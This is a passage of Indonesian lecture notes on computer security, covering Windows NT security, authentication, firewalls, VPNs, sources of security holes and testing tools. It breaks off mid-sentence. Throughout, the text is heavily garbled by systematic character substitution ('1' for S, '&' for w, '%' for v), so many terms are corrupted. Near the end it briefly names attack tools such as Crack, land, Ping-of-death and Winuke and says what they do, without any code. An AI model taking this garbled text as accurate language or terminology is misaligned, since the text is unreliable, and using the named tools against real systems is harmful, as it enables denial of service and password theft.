-ahap analisis ' mengukur kerusakan dan menentukan lokasi cluster yang harus
diperbarui per informasi dalam file log.
-ahap redo ' melakukan semua tahapan transaksi yang dicatat pada titik periksa
terakhir
-ahap undo ' mengembalikan ke kondisi semula untuk semua transaksi yang belum
selesai dikerjakan.
2al ' ;8
Keamanan Komputer
(e,tor spar!n : -eknik dynamic data reco%ery yang hanya terdapat pada disk 1"1) dengan
cara memanfaatkan teknologi fault!tolerant %olume untuk membuat duplikat data dari
sector yang mengalami error. Metodenya adalah dengan merekalkulasi dari stripe set
&ith parity atau dengan membaca sector dari mirror dri%e dan menulis data tersebut
ke sektor baru.
Cluster remapp!n : *ika ada kegagalan dalam transaksi )#? pada disk , secara otomatis akan
mencari cluster baru yang tidak rusak, lalu menandai alamat cluster yang mengandung bad
sector tersebut.
C* 3ault toleran,e : 0emampuan untuk menyediakan redudansi data secara realtime yang
akan memberikan tindakan penyelamatan bila terjadi kegagalan perangkat keras, korupsi
perangkat lunak dan kemungkinan masalah lainnya.
-eknologinya disebut @$)/ (@edudant $rrays of ineKpensi%e /isk) ' sebuah array disk
dimana dalam sebuah media penyimpanan terdapat informasi redudan tentang data yang
disimpan di sisa media tersebut.
0elebihan @$)/ '
Meningkatkan kinerja )#?
meningkatkan reabilitas media penyimpanan
$da ; bentuk fault tolerance '
3. /isk mirroring (@$)/ 3) ' meliputi penulisan data secara simultan kedua
media penyimpanan yang secara fisik terpisah.
;. /isk stripping dengan Parity (@$)/ 5) ' data ditulis dalam strip!strip le&at
satu array disk yang didalam strip!strip tersebut terdapat informasi parity yang dapat
digunakan untuk meregenerasi data apabila salah satu disk de%ice dalam strip set
mengalami kegagalan.
5* Model Keamanan ;!ndoEs NT
/ibuat dari beberapa komponen yang bekerja secara bersama!sama untuk memberikan
keamanan logon dan access control list ($"+) dalam ,- '
L(A 'Lo,al se,ur!t& Aut"or!t&9 ' menjamin user memiliki hak untuk mengakses system.
)nti keamanan yang menciptakan akses token, mengadministrasi kebijakan keamanan
local dan memberikan layanan otentikasi user.
Proses logon ' menerima permintaan logon dari user (logon interaktif dan logon remote),
menanti masukan username dan pass&ord yang benar. /ibantu oleh ,etlogon ser%ice.
(e,ur!t& A,,ount Manaer '(AM9 ' dikenal juga sebagai directory ser%ice database,
yang memelihara database untuk account user dan memberikan layan %alidasi untuk
proses +1$.
(e,ur!t& Re%eren,e Mon!tor '(RM9 ' memeriksa status iEin user dalam mengakses, dan
hak user untuk memanipulasi obyek serta membuat pesan!pesan audit.
6* Keamanan (umber da&a lo#al
?byek dalam ,- 4file, folder (directory), proses, thread, share dan de%ice9, masing!masing
akan dilengkapi dengan Ob&e# (e,ur!t& Des,r!ptor yang terdiri dari '
1ecurity )/ ?&ner ' menunjukkan user#grup yang memiliki obyek tersebut, yang
memiliki kekuasaan untuk mengubah akses permission terhadap obyek tersebut.
1ecurity )/ group ' digunakan oleh subsistem P?1)P saja.
/iscretionary $"+ ($ccess "ontrol +ist) ' identifikasi user dan grup yang
diperbolehkan # ditolak dalam mengakses, dikendalikan oleh pemilik obyek.
2al ' ;J
Keamanan Komputer
1ystem $"+ ' mengendalikan pesan auditing yang dibangkitkan oleh system,
dikendalikan oleh administrator keamanan jaringan.
7* Keamanan 1ar!nan
1en!s Keamanan 1ar!nan ;!ndoEs NT :
Model keamanan user le%el ' account user akan mendapatkan akses untuk pemakaian
bersama dengan menciptakan share atas directory atau printer.
o 0eunggulan ' kemampuan untuk memberikan user tertentu akses ke sumberdaya
yang di!share dan menentukan jenis akses apa yang diberikan.
o 0elemahan ' proses setup yang kompleks karena administrator harus memberitahu
setiap user dan menjaga policy system keamanan tetap dapat diba&ah kendalinya
dengan baik.
Model keamanan 1hare le%el ' dikaitkan dengan jaringan peer to peer, dimana user
manapun membagi sumber daya dan memutuskan apakaha diperlukan pass&ord untuk
suatu akses tertentu.
o 0euntungan ' kesederhanaannya yang membuat keamanan share!le%el tidak
membutuhkan account user untuk mendapatkan akses.
o 0elemahan ' sekali iEin akses # pass&ord diberikan, tidak ada kendali atas siap yang
menakses sumber daya.
Cara NT menanan! #eamanan jar!nan :
3. Memberikan permission '
Permission ,-F1 local
Permission shere
;. 0eamanan @$1 (@emote $ccess 1er%er)
Melakukan remote access user menggunakan dial!up '
?tentikasi user name dan pass&ord yang %alid dengan dial!in permission.
"allback security ' pengecekan nomor telepon yang %alid.
$uditing ' menggunakan auditing trails untuk melacak ke#dari siapa, kapan
user memiliki akses ke ser%er dan sumberdaya apa yang diakses.
<. Pengamanan +ayanan internet '
Fire&all terbatas pada )nternet )nformation ser%er ())1).
Menginstal tambahan proKy seperti Microsoft ProKy ser%er.
=. 1hare administrati%e 'memungkin administrator mendapatkan akses ke ser%er
&indo&s ,- atau &orkstation melalui jaringan
8* Keamanan pada pr!nter
/ilakukan dengan mensetting properties printer '
3. Menentukan permission ' full control, Manage document, print
;. Biasanya susunan permission pada ,- defaulut '
$dminstrator Y full control
?&ner Y Manage document
1emua user Y print
<. Mengontrol print job, terdiri dari '
1etting &aktu cetak
Prioritas
,otifikasi (orang yang perlu diberi peringatan)
=. 1et auditing information
2al ' ;7
Keamanan Komputer
=* Keamanan Re!str&
-ools yang disediakan dalam pengaksesan registry '
1ystem policy editor ' mengontrol akses terhadap registry editor, memungkinkan
administrator mengedit dan memodifikasi %alue tertentu dalam registry dengan berbasis
grafis.
@egistry editor (regedit<;.eKe) ' tools untuk melakukan edit dan modifikasi %alue dalam
registry.
:indo&s ,- /iagnostics (&inmsd.eKe) ' memungkinkan user melihat setting isi registry
dan %aluenya tanpa harus masuk ke registry editor sendiri.
Tools ba,#up untu# re!str& &a!tu :
@egback.eKe memanfaatkan command line # remote session untuk membackupr registry.
ntbackup.eKe ' otomatisasi backup 2$,C$ pada -ape dri%e, termasuk sebuah kopi dari
file backup registry local.
.mergency @epair /isk (rdisk.eKe) ' memback!up hi%e system dan soft&are dalam
registry.
>* Aud!t dan Pen,atatan Lo
Pencatatan logon dan logoff termasuk pencatatan dalam multi entry login
?bject access (pencatatan akses obyek dan file)
Pri%ilege 6se (paencatatan pemakaian hak user)
$ccount Management (manajemen user dan group)
Policy change (Pencatatan perubahan kebijakan keamanan)
1ystem e%ent (pencatatan proses restart, shutdo&n dan pesan system)
/etailed tracking (pencatatan proses dalam system secara detail)
KEAMANAN JARINGAN
)* Membatas! A#ses #e 1ar!nan
A* Membuat t!n#atan a#ses :
Pembatasan!pembatasan dapat dilakukan sehingga memperkecil peluang penembusan oleh
pemakai yang tak diotorisasi, misalnya '
Pembatasan login. +ogin hanya diperbolehkan '
Pada terminal tertentu.
2anya ada &aktu dan hari tertentu.
Pembatasan dengan call!back (+ogin dapat dilakukan siapapun. Bila telah sukses
login, sistem segera memutuskan koneksi dan memanggil nomor telepon yang telah
disepakati, Penyusup tidak dapat menghubungi le&at sembarang saluran telepon,
tapi hanya pada saluran telepon tertentu).
Pembatasan jumlah usaha login.
+ogin dibatasi sampai tiga kali dan segera dikunci dan diberitahu ke administrator.
1emua login direkam dan sistem operasi melaporkan informasi!informasi berikut '
:aktu, yaitu &aktu pemakai login.
-erminal, yaitu terminal dimana pemakai login.
-ingkat akses yang diiEinkan ( read # &rite # eKecute # all )
2al ' <G
Keamanan Komputer
0* Me#an!sme #endal! a#ses :
Masalah identifikasi pemakai ketika login disebut otentifikasi pemakai (user authentication).
0ebanyakan metode otentifikasi didasarkan pada tiga cara, yaitu '
3. 1esuatu yang diketahui pemakai, misalnya '
Pass&ord.
0ombinasi kunci.
,ama kecil ibu mertua.
/an sebagainya.
;. 1esuatu yang dimiliki pemakai, misalnya '
Badge.
0artu identitas.
0unci.
/an sebagainya.
<. 1esuatu mengenai (ciri) pemakai, misalnya '
1idik jari.
1idik suara.
Foto.
-anda tangan.
C* ;aspada ter"adap Re#a&asa sos!al :
3. Mengaku sebagi eksekutif yang tidak berhasil mengakses,
menghubungi administrator %ia telepon#faK.
;. Mengaku sebagai administrator yang perlu mendiagnosa
masalah net&ork, menghubungi end user %ia email#faK#surat.
<. Mengaku sebagai petugas keamanan e!commerce,
menghubungi customer yang telah bertransaksi untuk mengulang kembali
transaksinya di form yang disediakan olehnya.
=. pencurian surat, pass&ord.
5. penyuapan, kekerasan.
D* Membeda#an (umber da&a !nternal dan E#sternal :
Memanfaatkan teknologi fire&all yang memisahkan net&ork internal dengan net&ork
eksternal dengan rule tertentu.
E* (!stem Otent!#as! User :
De% : adalah proses penentuan identitas dari seseorang yang sebenarnya, hal ini diperlukan
untuk menjaga keutuhan ( integrity ) dan keamanan ( security ) data, pada proses ini
seseorang harus dibuktikan siapa dirinya sebelum menggunakan layanan akses.
Upa&a untu# leb!" menaman#an prote#s! passEordG antara la!n :
3. 1alting.
Menambahkan string pendek ke string pass&ord yang diberikan pemakai
sehingga mencapai panjang pass&ord tertentu.
;. ?ne time pass&ord.
Pemakai harus mengganti pass&ord secara teratur. 6paya ini membatasi peluang
pass&ord telah diketahui atau dicoba!coba pemakai lain.
2al ' <3
Keamanan Komputer
Bentuk ekstrim pendekatan ini adalah one time pass&ord, yaitu pemakai mendapat
satu buku berisi daftar pass&ord. 1etiap kali pemakai login, pemakai menggunakan
pass&ord berikutnya yang terdapat di daftar pass&ord.
/engan one time pass&ord, pemakai direpotkan keharusan menjaga agar buku
pass&ordnya jangan sampai dicuri.
<. 1atu daftar panjang pertanyaan dan ja&aban.
Mariasi terhadap pass&ord adalah mengharuskan pemakai memberi satu daftar
pertanyaan panjang dan ja&abannya. Pertanyaan!pertanyaan dan ja&abannya
dipilih pemakai sehingga pemakai mudah mengingatnya dan tak perlu menuliskan
di kertas.
Pertanyaan berikut dapat dipakai, misalnya '
1iapa mertua abang ipar Badru L
$pa yang diajarkan Pak 2arun &aktu 1/ L
/i jalan apa pertama kali ditemukan simanis L
Pada saat login, komputer memilih salah satu dari pertanyaan!pertanyaan secara
acak, menanyakan ke pemakai dan memeriksa ja&aban yang diberikan.
=. -antangan tanggapan (chalenge response).
Pemakai diberi kebebasan memilih suatu algoritma, misalnya K<.
0etika pemakai login, komputer menuliskan di layar angka <. /alam kasus ini
pemakai mengetik angka ;8. $lgoritma dapat berbeda di pagi, sore, dan hari
berbeda, dari terminal berbeda, dan seterusnya.
Conto" Produ# Otent!#as! UserG antara la!n :
3. 1ecureid $". ($ccess "ontrol .ncryption)
1ystem token hard&are seperti kartu kredit berdisplay, pemakai akan menginput
nomor pin yang diketahui bersama, lalu memasukkan pascode bah&a dia pemilik
token.
;. 1#key (Bellcore)
1ystem soft&are yang membentuk one time pass&ord (?-P) berdasarkan informasi
loginterkhir dengan aturan random tertentu.
<. Pass&ord $uthentication Protocol (P$P)
Protokol dua arah untuk PPP (Point to point Protocol). Peer mengirim pasangan user
id dan pass&ord, authenticator menyetujuinya.
=. "hallenge 2andshake $uthentication Protocol ("2$P)
1#key pada P$P, protocol < arah, authenticator mengirim pesan tantangan ke peer,
peer menghitung nilai lalu mengirimkan ke authenticator, authenticator menyetujui
otentikasi jika ja&abannya sama dengan nilai tadi.
5. @emote $uthentication /ial!in 6ser 1er%ice (@$/)61)
6ntuk hubungan dial!up, menggunakan net&ork access ser%er, dari suatu host yang
menjadi client @$/)61, merupan system satu titik akses.
D. -erminal $ccess "ontroller $ccess "ontrol 1ystem (-$"$"1)
Protokol keamanan berbasis ser%er dari ")1"? 1ystem. 1ecury^ity 1er%er terpusat
dangan file pass&ord 6,)P, database otentikasi, otorisasi dan akunting, fungsi digest
(transmisi pass&ord yang tidak polos)
4* Mel!ndun! Aset Oran!sas!
2al ' <;
Keamanan Komputer
A*(e,ara Adm!ns!strat!% - %!s!#
@encana kemungkinan terhadap bencana
Program penyaringan calon pega&ai system informasi
Program pelatihan user
0ebijakan akses net&ork
0* (e,ara Te#n!s
0*)* Penerapan 3!reEall
Ist!la" pada penerapan 3!reEall
2ost
1uatu sistem komputer yang terhubung pada suatu net&ork
Bastion host
1istem komputer yang harus memiliki tingkat sekuritas yang tinggi karena sistem ini
ra&an sekali terhadap serangan hacker dan cracker, karena biasanya mesin ini diekspos
ke net&ork luar ()nternet) dan merupakan titik kontak utama para user dari internal
net&ork.
Packet Filtering
$ksi dari suatu de%ais untuk mengatur secara selektif alur data yang melintasi suatu
net&ork. Packet filter dapat memblok atau memperbolehkan suatu paket data yang
melintasi net&ork tersebut sesuai dengan kebijaksanaan alur data yang digunakan
(security policy).
Perimeter net&ork
1uatu net&ork tambahan yang terdapat di antara net&ork yang dilindungi dengan net&ork
eksternal, untuk menyediakan layer tambahan dari suatu sistem security. Perimeter
net&ork juga sering disebut dengan /MT (/e!MillitariEed Tone).
Keuntunan 3!reEall :
Fire&all merupakan fokus dari segala keputusan sekuritas. 2al ini disebabkan karena
Fire&all merupakan satu titik tempat keluar masuknya trafik internet pada suatu jaringan.
Fire&all dapat menerapkan suatu kebijaksanaan sekuritas. Banyak sekali ser%ice!ser%ice
yang digunakan di )nternet. -idak semua ser%ice tersebut aman digunakan, oleh
karenanya Fire&all dapat berfungsi sebagai penjaga untuk menga&asi ser%ice!ser%ice
mana yang dapat digunakan untuk menuju dan meninggalkan suatu net&ork.
Fire&all dapat mencatat segala akti%itas yang berkaitan dengan alur data secara efisien.
1emua trafik yang melalui Fire&all dapat diamati dan dicatat segala akti%itas yang
berkenaan dengan alur data tersebut. /engan demikian ,et&ork $dministrator dapat
segera mengetahui jika terdapat akti%itas!akti%itas yang berusaha untuk menyerang
internal net&ork mereka.
Fire&all dapat digunakan untuk membatasi pengunaan sumberdaya informasi. Mesin
yang menggunakan Fire&all merupakan mesin yang terhubung pada beberapa net&ork
yang berbeda, sehingga kita dapat membatasi net&ork mana saja yang dapat mengakses
suatu ser%ice yang terdapat pada net&ork lainnya.
Kelema"an 3!reEall :
Fire&all tidak dapat melindungi net&ork dari serangan koneksi yang tidak mele&atinya
(terdapat pintu lain menuju net&ork tersebut).
Fire&all tidak dapat melindungi dari serangan dengan metoda baru yang belum dikenal
oleh Fire&all.
Fire&all tidak dapat melindungi dari serangan %irus.
Pilihan klasifikasi desain Firewall :
2al ' <<
Keamanan Komputer
3. Packet Filtering
1istem paket filterin/ atau sering juga disebut dengan screenin/ router adalah
router yang melakukan routing paket antara internal dan eksternal net'or" secara
selektif sesuai dengan security policy yang digunakan pada net'or" tersebut.
)nformasi yang digunakan untuk menyeleksi paket!paket tersebut adalah'
)P address asal
)P address tujuan
Protocol (-"P, 6/P, atau )"MP)
Port -"P atau 6/P asal
Port -"P atau 6/P tujuan
Beberapa contoh routing paket selektif yang dilakukan oleh Screenin/ ,outer '
1emua koneksi dari luar sistem yang menuju internal net'or" diblokade kecuali
untuk koneksi 1M-P
Memperbolehkan serice email dan F-P, tetapi memblok serice!serice
berbahaya seperti -F-P, P :indo&, @P" dan r serice (rlogin, rsh, rcp, dan
lain!lain).
1elain memiliki keuntungan tertentu di antaranya aplikasi screenin/ router ini dapat
bersifat transparan dan implementasinya relatif lebih murah dibandingkan metode
fire'all yang lain, sistem paket filterin/ ini memiliki beberapa kekurangan yakni '
tingkat securitynya masih rendah, masih memungkinkan adanya )P 1poofing, tidak
ada screenin/ pada layer!layer di atas net'or" layer.
;. $pplication +e%el >ate&ay (ProKy 1er%ices)
#ro8y serice merupakan aplikasi spesifik atau program ser%er yang dijalankan pada
mesin !ire'all, program ini mengambil user re.uest untuk )nternet serice (seperti
F-P, telnet, 2--P) dan meneruskannya (bergantung pada security policy) ke host
yang dituju* /engan kata lain adalah pro8y merupakan perantara antara internal
net'or" dengan eksternal net'or" ()nternet).
Pada sisi ekternal hanya dikenal mesin pro8y tersebut, sedangkan mesin!mesin yang
berada di balik mesin pro8y tersebut tidak terlihat. $kibatnya sistem pro8y ini
kurang transparan terhadap user yang ada di dalam
1istem #ro8y ini efektif hanya jika pada konjungsi antara internal dan eksternal
net'or" terdapat mekanisme yang tidak memperbolehkan kedua net'or" tersebut
terlibat dalam komunikasi langsung.
0euntungan yang dimiliki oleh sistem pro8y ini adalah tingkat sekuritasnya lebih
baik daripada screenin/ router, deteksi paket yang dilakukan sampai pada layer
aplikasi. 1edangkan kekurangan dari sistem ini adalah perfomansinya lebih rendah
daripada screenin/ router karena terjadi penambahan header pada paket yang
dikirim, aplikasi yang di!support oleh pro8y ini terbatas, serta sistem ini kurang
transparan.
Ars!te#tur dasar %!reEall :
$rsitektur dengan dual!homed host (kadang kadang dikenal juga sebagai dual homed
/ate'ay# /2>)
1istem /2> menggunakan sebuah komputer dengan (paling sedikit) dua net&ork!
interface. )nterface pertama dihubungkan dengan jaringan internal dan yang lainnya
dengan )nternet. /ual!homed host nya sendiri berfungsi sebagai bastion host (front
terdepan, bagian terpenting dalam fire&all).
2al ' <=
Keamanan Komputer
screened!host (screened host /ate'ay# 12>)
Pada topologi 12>, fungsi fire&all dilakukan oleh sebuah screening!router dan bastion
host. @outer ini dikonfigurasi sedemikian sehingga akan menolak semua trafik kecuali
yang ditujukan ke bastion host, sedangkan pada trafik internal tidak dilakukan
pembatasan. /engan cara ini setiap client ser%is pada jaringan internal dapat
menggunakan fasilitas komunikasi standard dengan )nternet tanpa harus melalui proKy.
screened subnet (screened subnet /ate'ay# 11>).
Fire&all dengan arsitektur screened!subnet menggunakan dua screening!router dan
jaringan tengah (perimeter net'or") antara kedua router tersebut, dimana ditempatkan
bastion host. 0elebihan susunan ini akan terlihat pada &aktu optimasi penempatan ser%er.
0*4* Penerapan :!rtual Pr!+at NetEor# ':PN9
2al ' <5

)nternet
bastion
host
$rsitektur dengan dual!homed host
)nternet
bastion!host
router
$rsitektur dengan screened!host
)nternet
bastion!host
router
eksternal
$rsitektur dengan screened!subnet
router
internal
jaringan tengah
Keamanan Komputer
De%en!s! :PN
Mirtual Pri%ate ,et&ork atau *aringan Pribadi Maya sesungguhnya sama dengan *aringan
Pribadi (Pri%ate ,et&ork#P,) pada umumnya, di mana satu jaringan komputer suatu lembaga
atau perusahaan di suatu daerah atau negara terhubung dengan jaringan komputer dari satu
grup perusahaan yang sama di daerah atau negara lain. Perbedaannya hanyalah pada media
penghubung antar jaringan. 0alau pada P,, media penghubungnya masih merupakan milik
perusahaan#grup itu sendiri, dalam MP,, media penghubungnya adalah jaringan publik
seperti )nternet.
/alam MP,, karena media penghubung antar jaringannya adalah jaringan publik, diperlukan
pengamanan dan pembatasan!pembatasan. Pengamanan diperlukan untuk menjaga agar tidak
sebarang orang dari jaringan publik dapat masuk ke jaringan pribadi. Cang dikecualikan
hanyalah orang!orang yang terdaftar atau terotentifikasi terlebih dahulu yang dapat masuk ke
jaringan pribadi. Pembatasan diperlukan untuk menjaga agar tidak semua orang atau user dari
jaringan pribadi dapat mengakses jaringan publik (internet).
Cara membentu# :PN
)* Tunnell!n
1esuai dengan arti tunnel atau lorong, dalam membentuk suatu MP, ini dibuat suatu tunnel di
dalam jaringan publik untuk menghubungkan antara jaringan yang satu dan jaringan lain dari
suatu grup atau perusahaan.yang ingin membangun MP, tersebut. 1eluruh komunikasi data
antarjaringan pribadi akan melalui tunnel ini, sehingga orang atau user dari jaringan publik
yang tidak memiliki iEin untuk masuk tidak akan mampu untuk menyadap, mengacak atau
mencuri data yang melintasi tunnel ini. $da beberapa metode tunelling yang umum dipakai,
di antaranya'
! )PP -o )P -unnelling, atau
! PPP -o )P -unnelling
)PP -o )P tunnelling biasa digunakan dalam jaringan MP, ,o%ell ,et&are. *adi dua jaringan
,o%ell yang terpisah akan tetap dapat saling melakukan komunikasi data melalui jaringan
publik )nternet melalui tunnel ini tanpa kuatir akan adanya gangguan pihak ke!< yang ingin
mengganggu atau mencuri data. Pada )PP -o )P tunnelling, paket data dengan protokol )PP
(standar protokol ,o%ell) akan dibungkus (encapsulated) terlebih dahulu oleh protokol )P
(standar protokol )nternet) sehingga dapat melalui tunnel ini pada jaringan publik )nternet.
1ama halnya untuk PPP -o )P tunnelling, di mana PPP protokol diencapsulated oleh )P
protokol.
1aat ini beberapa %endor hard&are router seperti "isco, 1hi%a, Bay ,et&orks sudah
menambahkan kemampuan MP, dengan teknologi tunnelling pada hard&are mereka.
4* 3!reEall
1ebagaimana layaknya suatu dinding, Fire&all akan bertindak sebagai pelindung atau
pembatas terhadap orang!orang yang tidak berhak untuk mengakses jaringan kita. 6mumnya
dua jaringan yang terpisah yang menggunakan Fire&all yang sejenis, atau seorang remote
user yang terhubung ke jaringan dengan menggunakan soft&are client yang terenkripsi akan
membentuk suatu MP,, meskipun media penghubung dari kedua jaringan tersebut atau
penghubung antara remote user dengan jaringan tersebut adalah jaringan publik seperti
)nternet.
2al ' <D
Keamanan Komputer
1uatu jaringan yang terhubung ke )nternet pasti memiliki )P address (alamat )nternet) khusus
untuk masing!masing komputer yang terhubung dalam jaringan tersebut. $pabila jaringan ini
tidak terlindungi oleh tunnel atau fire&all, )P address tadi akan dengan mudahnya dikenali
atau dilacak oleh pihak!pihak yang tidak diinginkan. $kibatnya data yang terdapat dalam
komputer yang terhubung ke jaringan tadi akan dapat dicuri atau diubah. /engan adanya
pelindung seperti fire&all, kita bisa menyembunyikan (hide) address tadi sehingga tidak dapat
dilacak oleh pihak!pihak yang tidak diinginkan.
Kemampuan %!reEall dalam penerapann&a pada :PN
o )P 2iding#Mapping. 0emampuan ini mengakibatkan )P address dalam jaringan dipetakan
atau ditranslasikan ke suatu )P address baru. /engan demikian )P address dalam jaringan
tidak akan dikenali di )nternet.
o Pri%ilege +imitation. /engan kemampuan ini kita dapat membatasi para user dalam
jaringan sesuai dengan otorisasi atau hak yang diberikan kepadanya. Misalnya, 6ser $
hanya boleh mengakses home page, user B boleh mengakses home page, e!mail dan
ne&s, sedangkan user " hanya boleh mengakses e!mail.
o ?utside +imitation. /engan kemampuan ini kita dapat membatasi para user dalam
jaringan untuk hanya mengakses ke alamat!alamat tertentu di )nternet di luar dari jaringan
kita.
o )nside +imitation. 0adang!kadang kita masih memperbolehkan orang luar untuk
mengakses informasi yang tersedia dalam salah satu komputer (misalnya :eb 1er%er)
dalam jaringan kita. 1elain itu, tidak diperbolehkan, atau memang sama sekali tidak
diEinkan untuk mengakses seluruh komputer yang terhubung ke jaringan kita.
o Pass&ord and .ncrypted $uthentication. Beberapa user di luar jaringan memang
diiEinkan untuk masuk ke jaringan kita untuk mengakses data dan sebagainya, dengan
terlebih dahulu harus memasukkan pass&ord khusus yang sudah terenkripsi.
5* Menaman#an saluran terbu#a
Protokol -"P#)P merupakan protocol dalam set standar yang terbuka dalam pengiriman data,
untuk itulah perlu dilakukan enkripsi dalam rangka penanganan keamanan data yang
diterapkan pada protocol tersebut, yang meliputi '
A* Keamanan Panda lap!san Apl!#as!
1.- (1ecure .lectronics -ransaction)
o Menentukan bagaimana transaksi mengalir antara pemakai, pedagang dan
bank.
o Menentukan fungsi keamanan ' digital signature, hash dan enkripsi.
o Produk dari Mastercard dan M)1$ )nternational.
1ecure 2--P
o Produk dari &orkgroup ).-F, diimplementasikan pada &ebser%er mulai
3775.
o Menentukan mekanisme kriptografi standar untuk mengenkripsikan
pengiriman data http
2al ' <8
Keamanan Komputer
Pretty >ood Pri%acy (P>P)
o 1tandarisasi @F" 3773
o Membuat dan memastikan digital signature, mengenkripsi Y deskripsi dan
mengkompresi data.
1ecure M)M. (1#M)M.)
o 1tandarisasi @F" 35;3
o M)M. (Multipurpose )nternet Mail .Ktension)
o Menentukan cara menempelkan file untuk dikirim ke internet dengan
menggunakan metode hirarki dalm pendefenisian user remi dan sertfikat
digitalnya.
"ybercash
o 1tandarisasi @F" 3J7J
o Memproses kartu kredit di internet dengan mengenkripsi dan
menandatangani transaksi secara digital.
0* Keamanan dalam Lap!san Transport
11+ (1ecure 1ocket +ayer)
o Produk ,etscape
o Protocol yang menegoisasikan hubungan yang aman antara client dan ser%er,
dengan menggunakan kunci enkripsi =G!bit.
C* Keamanan dalam Lap!san NetEor#
)P security Protocol ' melindungi protocol client )P pada net&ork
layer.
)P $uthentication header
)P .ncapsulating 1ecurity protocol
1imple!key management for )nternet protocol (10)P)
)nternet security $ssociation and key management protocol
()1$0MP)
)nternet key management protocol ()0MP)
1umber ' &&&.ietf.org
EVALUASI KEAMANAN SISTEM INFORMASI
(E0A0 MA(ALAH KEAMANAN HARU( (ELALU DIMONITOR :
/itemukannya lubang keamanan (security hole) yang baru. Perangkat lunak dan
perangkat keras biasanya sangat kompleks sehingga tidak mungkin untuk diuji seratus
persen. 0adang!kadang ada lubang keamanan yang ditimbulkan oleh kecerobohan
implementasi.
0esalahan konfigurasi. 0adang!kadang karena lalai atau alpa, konfigurasi sebuah sistem
kurang benar sehingga menimbulkan lubang keamanan. Misalnya mode (permission atau
kepemilikan) dari berkas yang menyimpan pass&ord (#etc#pass&d di sistem 6,)P) secara
tidak sengaja diubah sehingga dapat diubah atau ditulis oleh orang!orang yang tidak
berhak.
2al ' <J
Keamanan Komputer
Penambahan perangkat baru (hard&are dan#atau soft&are) yang menyebabkan
menurunnya tingkat security atau berubahnya metoda untuk mengoperasikan sistem.
?perator dan administrator harus belajar lagi. /alam masa belajar ini banyak hal yang
jauh dari sempurna, misalnya ser%er atau soft&are masih menggunakan konfigurasi a&al
dari %endor (dengan pass&ord yang sama).
(UM0ER LU0AN2 KEAMANAN
)* (ala" D!sa!n 'des!n %laE9
6mumnya jarang terjadi. $kan tetapi apabila terjadi sangat sulit untuk diperbaiki.
$kibat disain yang salah, maka biarpun dia diimplementasikan dengan baik,
kelemahan dari sistem akan tetap ada.
"ontoh '
+emah disainnya algoritma enkripsi @?-3< atau "aesar cipher, dimana karakter
digeser 3< huruf atau < huruf. Meskipun diimplementasikan dengan
programming yang sangat teliti, siapapun yang mengetahui algoritmanya dapat
memecahkan enkripsi tersebut.
0esalahan disain urutan nomor (se_uence numbering) dari paket -"P#)P.
0esalahan ini dapat dieksploitasi sehingga timbul masalah yang dikenal dengan
nama B)P spoofing( (sebuah host memalsukan diri seolah!olah menjadi host
lain dengan membuat paket palsu setelah engamati urutan paket dari host yang
hendak diserang).
4* Implementas! #uran ba!#
Banyak program yang diimplementasikan secara terburu!buru sehingga kurang
cermat dalam pengkodean.
$kibat tidak adanya cek atau testing implementasi suatu program yang baru dibuat.
"ontoh'
-idak memperhatikan batas (Bbound() dari sebuah Barray( tidak dicek sehingga
terjadi yang disebut out!of!bound array atau buffer o%erflo& yang dapat
dieksploitasi (misalnya o%er&rite ke %ariable berikutnya).
0ealpaan memfilter karakter!karakter yang aneh!aneh yang dimasukkan sebagai
input dari sebuah program sehingga sang program dapat mengakses berkas atau
informasi yang semestinya tidak boleh diakses.
5* (ala" #on%!uras!
"ontoh '
Berkas yang semestinya tidak dapat diubah oleh pemakai secara tidak sengaja
menjadi B&riteable(. $pabila berkas tersebut merupakan berkas yang penting,
seperti berkas yang digunakan untuk menyimpan pass&ord, maka efeknya
menjadi lubang keamanan. 0adangkala sebuah komputer dijual dengan
konfigurasi yang sangat lemah.
$danya program yang secara tidak sengaja diset menjadi Bsetuid root( sehingga
ketika dijalankan pemakai memiliki akses seperti super user (root) yang dapat
melakukan apa saja.
6* (ala" menuna#an proram atau s!stem
"ontoh '
0esalahan menggunakan program yang dijalankan dengan menggunakan account
root (super user) dapat berakibat fatal.
2al ' <7
Keamanan Komputer
PEN2U1I KEAMANAN (I(TEM
6ntuk memudahkan administrator dari sistem informasi membutuhkan Bautomated tools(,
perangkat pembantu otomatis, yang dapat membantu menguji atau meng!e%aluasi
keamanan sistem yang dikelola.
"ontoh -ools -erintegrasi'
Peran#at luna# bantu (!stem Operas!
"ops 6,)P
-rip&ire 6,)P
1atan#1aint 6,)P
1B1can' localhost security scanner 6,)P
Ballista Nhttp'##&&&.secnet.comO :indo&s ,-
Dan seba/ainya9 (cari sendiri:1
"ontoh -ools Pengujian yang dibuat para hacker '
Tools Keunaan
"rack program untuk menduga atau memecahkan pass&ord
dengan menggunakan sebuah atau beberapa kamus (dictionary).
Program crack ini melakukan brute force cracking dengan
mencoba mengenkripsikan sebuah kata yang diambil dari kamus,
dan kemudian membandingkan hasil enkripsi dengan pass&ord
yang ingin dipecahkan.
land dan latierra sistem :indo&s 75#,- menjadi macet (hang, lock up). Program
ini mengirimkan sebuah paket yang sudah di(spoofed( sehingga
seolah!olah paket tersebut berasal dari mesin yang sama dengan
menggunakan port yang terbuka
Ping!o!death sebuah program (ping) yang dapat meng!crash!kan :indo&s
75#,- dan beberapa %ersi 6niK.
:inuke program untuk memacetkan sistem berbasis :indo&s
Dan seba/ainya9 (cari sendiri:1
PRO0IN2 (ER:ICE(
/efenisi Probing ' Bprobe( (meraba) ser%is apa saja yang tersedia. Program ini juga
dapat digunakan oleh kriminal untuk melihat ser%is apa saja yang tersedia di sistem
yang akan diserang dan berdasarkan data!data yang diperoleh dapat melancarkan
serangan.
1er%is di )nternet umumnya dilakukan dengan menggunakan protokol -"P atau 6/P.
1etiap ser%is dijalankan dengan menggunakan port yang berbeda, misalnya'
o 1M-P, untuk mengirim dan menerima e!mail, -"P, port ;5
o P?P<, untuk mengambil e!mail, -"P, port 33G
"ontoh di atas hanya sebagian dari ser%is yang tersedia. /i system 6,)P, lihat
berkas #etc#ser%ices dan #etc#inetd.conf untuk melihat ser%is apa saja yang dijalankan
oleh ser%er atau komputer yang bersangkutan.
Pemilihan ser%is apa saja tergantung kepada kebutuhan dan tingkat keamanan yang
diinginkan. 1ayangnya seringkali sistem yang dibeli atau dirakit menjalankan
2al ' =G
Keamanan Komputer
beberapa ser%is utama sebagai Bdefault(. 0adang!kadang beberapa ser%is harus
dimatikan karena ada kemungkinan dapat dieksploitasi oleh cracker. 6ntuk itu ada
beberapa program yang dapat digunakan untuk melakukan
6ntuk beberapa ser%is yang berbasis -"P#)P, proses probe dapat dilakukan dengan
